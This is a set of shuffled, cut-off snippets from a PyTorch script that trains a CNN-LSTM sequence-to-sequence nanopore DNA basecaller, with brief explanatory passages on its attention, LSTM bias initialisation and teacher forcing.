"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val,",
"editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model,",
"hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port),",
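These decoder fragments score the hidden state against the encoder outputs through a learned self.attn layer, then bmm the softmaxed weights with the encoder outputs and concatenate the context onto the decoder input. A generic dot-product variant of the same idea (the scoring function below is an assumption, not the script's exact self.attn):

    import torch
    import torch.nn.functional as F

    dec_h = torch.randn(4, 16)              # current decoder hidden state: [batch, hidden]
    enc_out = torch.randn(4, 20, 16)        # encoder outputs: [batch, src_len, hidden]

    scores = torch.bmm(enc_out, dec_h.unsqueeze(2)).squeeze(2)          # [batch, src_len]
    attn_weights = F.softmax(scores, dim=1)
    context = torch.bmm(attn_weights.unsqueeze(1), enc_out).squeeze(1)  # [batch, hidden]
    decoder_input = torch.cat((dec_h, context), dim=1)                  # [batch, 2*hidden]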
"INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT",
"= False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim",
"start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start,",
"signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object",
"input_decoder # [max. target length, batch size, output dim] top1 = input_decoder.argmax(1) #",
"= [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port),",
"pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set =",
"b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length",
"performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val],",
"start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start,",
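The n//4:n//2 slice works because PyTorch packs LSTM biases in gate order (input, forget, cell, output), each of size hidden_size. A minimal reconstruction of the forget-gate bias initialization these fragments perform, with a made-up bias value:

    import torch.nn as nn

    lstm = nn.LSTM(input_size=8, hidden_size=16, num_layers=1)
    for name, param in lstm.named_parameters():
        if "bias" in name:                    # bias_ih_l0 and bias_hh_l0, each of size 4*hidden
            n = param.size(0)
            start, end = n // 4, n // 2       # the forget-gate slice
            param.data[start:end].fill_(1.0)  # e.g. bias the cell toward remembering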
"+ \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for",
"pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD)",
"----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder",
"np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train =",
"argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping",
"so that they match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long())",
"epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1)))",
"epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation",
"+ 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val =",
"return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10,",
"ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy =",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf",
"bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self):",
"ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy",
"11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m,",
"* cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(),",
"# In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset =",
"and \"lstm\" in name and \"linear\" not in name: for b in [\"input\",",
":].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden",
"= optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion =",
"we got to the last element in the batch if i == max_in_batch:",
"assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\"",
"sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from",
"predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot",
"output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size #",
"nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11,",
"= nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2,",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF",
"help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)),",
"# Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim] #",
"<= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True,",
"----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder",
"updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] =",
"labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN",
"% make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates",
"args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop",
"Redistributions in binary form must reproduce the above copyright notice, this list of",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE",
"early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in",
"val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4]",
"self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size,",
"self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim *",
"descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len,",
"to check if it has decresed, # and if it has, it will",
"ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"through LSTM layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out:",
"\"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600)",
"#if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1",
"acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train",
"const=True, default=True) parser.add_argument('--dropout', type=float, default=0.0, choices=[Range(0.0, 1.0)], help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256,",
"2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length,",
"HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns",
"heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed",
"print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4, n//2 #",
"dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val",
"equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have",
"updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward()",
"plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3)",
"\"bias\" in p and \"lstm\" in p and \"linear\" not in p: n",
"pass through LSTM layer # shape of lstm_in: [batch, input_dim] # shape of",
"# get argmax of prediction #if teacher forcing, use actual next token as",
"the above copyright notice, this list of conditions and the following disclaimer. 2.",
"\"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4",
"IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p",
"dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2",
"updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for",
"and the following disclaimer. 2. Redistributions in binary form must reproduce the above",
"int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p in",
"from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import",
"input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train",
"h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) #",
"lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward",
"input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val,",
"acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig =",
"seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val =",
"= sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases:",
"import pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker as",
"filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch",
"input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2,",
"100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val",
"= fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\")",
"(1, batch, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module):",
"patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={},",
"epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd",
"dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder],",
"def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size =",
"from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import",
"= 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g =",
"/ float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val",
"NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden",
"else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1:",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target",
"std) def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1)",
"length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training",
"= batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional =",
"hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec",
"batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths):",
"break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input,",
"\"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0] # input",
"BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A",
"Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val,",
"reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long())",
"enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3]",
"target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,}",
"input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"# or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5)",
"nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=1.0, choices=[Range(0.0, 1.0)], help=\"Teacher forcing ratio. Default=1, TF on\")",
"np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(acc_iteration) dict_validation_loss2[updates] = np.mean(val_losses) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val",
"num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed",
"nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\")",
"must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None,",
"idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2",
"Variable import torch.nn.functional as F import torchvision import pickle import random import time",
"label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\")",
"loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration, data in",
"every n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda",
"'{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with",
"== 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader)",
"input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq,",
"momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model",
"on training set\\n\") f.write(\"training acc\\tvalidation acc\\ttraining loss\\tvalidation loss\\ttraining edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train],",
"writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates]",
"updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val,",
"input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val",
"out dim] return outputs, hidden # Sequence to sequence model # ----------- class",
"output = (seq*batch, out dim), target = (seq*batch) # do not one-hot encode the target",
"= np.mean(acc_iteration) dict_validation_loss2[updates] = np.mean(val_losses) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation',",
"start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start,",
"############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs,",
"= self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2)))",
"def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer",
"#### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 =",
"epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val",
"batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional",
"samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, :",
"(reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc",
"self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) -->",
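The decoder emits F.log_softmax outputs and the loss is NLLLoss(ignore_index=5), so positions labelled with the <PAD> index contribute nothing to the loss or its gradient. A toy demonstration of that pairing:

    import torch
    import torch.nn.functional as F

    logits = torch.randn(6, 5)                    # (seq*batch, 5 classes: A, C, G, T, <EOS>)
    log_probs = F.log_softmax(logits, dim=1)
    targets = torch.tensor([0, 1, 5, 2, 5, 3])    # 5 = <PAD>
    criterion = torch.nn.NLLLoss(ignore_index=5)  # padded positions are skipped
    loss = criterion(log_probs, targets)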
"running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer",
"v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates",
"import SummaryWriter import itertools import seaborn as sns import pandas as pd import",
"type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b',",
"old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for",
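ReduceLROnPlateau watches the metric passed to scheduler.step() and shrinks the learning rate once it stops improving; the call pattern used here, on a toy optimizer with made-up losses:

    import torch
    import torch.nn as nn

    model = nn.Linear(4, 2)
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, "min", factor=0.1, patience=10)

    for val_loss in (0.9, 0.8, 0.8, 0.8):     # hypothetical validation losses
        scheduler.step(val_loss)              # lr is reduced once the loss plateaus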
"and teacher_forcing_ratio >= 0.25: # if we have reached half of the updates",
"# and if it has, it will make a checkpoint of the current",
"if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return",
"args.call lr = args.learning_rate editD = args.editD sgd = False out_classes = 5",
"undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets or batch",
"in the batch if i == max_in_batch: break # when seq length (i)",
"fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for",
"nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim,",
"0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0",
"print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0",
"val_set[5].size()) # [batch size] is typically chosen between 1 and a few hundreds,",
"f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit",
":] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value",
"your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\",",
"with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1]",
"input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int,",
"by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0,",
"(num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 =",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,",
"target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder",
"running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates",
"[train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port),",
"dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for",
"i += 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if",
"batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2],",
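For a bidirectional encoder the hidden states arrive as [num_layers*2, batch, hidden] with the forward directions at the even indices; the strided-slice-and-cat in these fragments folds them into [num_layers, batch, 2*hidden] so a unidirectional decoder of width hidden_dim*2 can consume them. A self-contained sketch:

    import torch
    import torch.nn as nn

    lstm = nn.LSTM(input_size=8, hidden_size=16, num_layers=2,
                   bidirectional=True, batch_first=True)
    _, (h, c) = lstm(torch.randn(4, 10, 8))        # h, c: [num_layers*2, batch, hidden]

    h_cat = torch.cat([h[0::2], h[1::2]], dim=2)   # forward ++ backward: [2, 4, 32]
    c_cat = torch.cat([c[0::2], c[1::2]], dim=2)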
"'--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation set\") #",
"c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :,",
"= EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {}",
":].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val)",
"dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden,",
"sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return",
"one hot encode input input_decoder = label if teacher_force else onehot # [batch",
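Per decoding step the fragments draw a random number against teacher_forcing_ratio and feed back either the ground-truth label or the one-hot of the model's own argmax. A minimal sketch (note the per-row torch.arange indexing when building the one-hot, matching the fix applied above):

    import random
    import torch

    batch, output_dim = 4, 5
    label = torch.randn(batch, output_dim)        # ground-truth step (one-hot in the script)
    prediction = torch.randn(batch, output_dim)   # decoder output for this step

    top1 = prediction.argmax(1)                   # predicted class per batch element
    onehot = torch.zeros(batch, output_dim)
    onehot[torch.arange(batch), top1] = 1         # one-hot encode each row's prediction

    teacher_force = random.random() < 0.9         # teacher_forcing_ratio = 0.9
    input_decoder = label if teacher_force else onehot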
"criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1)",
"LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True):",
">= 0.25: # if we have reached half of the updates teacher_forcing_ratio =",
"hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 =",
"max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname,",
